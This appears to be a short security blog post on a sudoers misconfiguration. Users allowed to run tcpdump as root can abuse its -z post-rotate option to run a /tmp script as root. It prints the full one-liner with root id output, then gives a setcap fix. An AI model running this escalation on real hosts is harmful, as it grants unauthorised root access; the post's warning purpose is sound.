Do you have Linux hosts with non privileged users allowed to run tcpdump by placing tcpdump in the sudoers file? There’s a tcpdump –z flag that allow you to specify a post-rotate command to run. The user can create a text file in /tmp with commands that will be executed as root.
Although this isn’t a newly discovered hack, it bears repeating because of the fact that this is still seen in production environments.
$ sudo -l [sudo] password for john: User john may run the following commands on this host: (root) /usr/sbin/tcpdump
Used in conjunction with the -C or -G options, this will make tcpdumprun ” postrotate-command file ” where file is the savefile being closed after each rotation. For example, specifying -z gzipor -z bzip2 will compress each savefile using gzip or bzip2.
A way to test this is to create a file… /tmp/.test and place the “id” command in it then run the command: “sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root”
It will output:
uid=0(root) gid=0(root) groups=0(root)
The way to fix this:
With the following commands we can run Tcpdump as a normal user instead of a root user.
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump